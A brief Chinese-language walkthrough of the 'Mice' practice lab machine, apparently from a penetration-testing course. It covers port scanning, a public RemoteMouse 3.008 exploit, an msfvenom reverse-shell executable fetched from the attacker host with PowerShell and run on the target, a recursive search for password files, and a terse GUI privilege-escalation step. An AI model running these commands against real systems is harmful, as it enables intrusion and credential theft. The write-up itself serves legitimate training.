PG靶机复现 Mice
端口扫描
nmap -sC -sV -Pn -n -T4 -p- 192.168.229.199
枚举和利用
google一下发现可能存在
Remote Mouse 3.008 - Failure to Authenticate
RemoteMouse 应用程序是一个可以从手机或平板电脑远程控制计算机的程序。这个漏洞允许连接到远程 RemoteMouse 服务,以虚拟方式按下任意键并在机器上执行代码。
exp:
https://github.com/p0dalirius/RemoteMouse-3.008-Exploit/tree/master
生成恶意exe文件
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.227 LPORT=80 -f exe > reshell.exe
python3 RemoteMouse-3.008-Exploit.py --target-ip 192.168.229.199 --cmd "powershell -c \"iwr http://192.168.45.227/reshell.exe -o C:\Windows\Temp\reshell.exe\""
python3 RemoteMouse-3.008-Exploit.py --target-ip 192.168.229.199 --cmd "C:\Windows\Temp\reshell.exe"
提取
查找发现local文件
powershell Get-ChildItem -Path C:\Users -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx,*.config,*.kdbx,*.lnk -File -Recurse -ErrorAction SilentlyContinue
powershell iwr http://192.168.45.227/winPEASx64.exe -o winPEASx64.exe
发现
但是我们需要rdp进入,该shell用户是rdp组
查看密码文件,发现密码
得到密码,现在可以rdp进入系统
查看提权步骤:
在右下角打卡
选择Change
然后回车
成功提权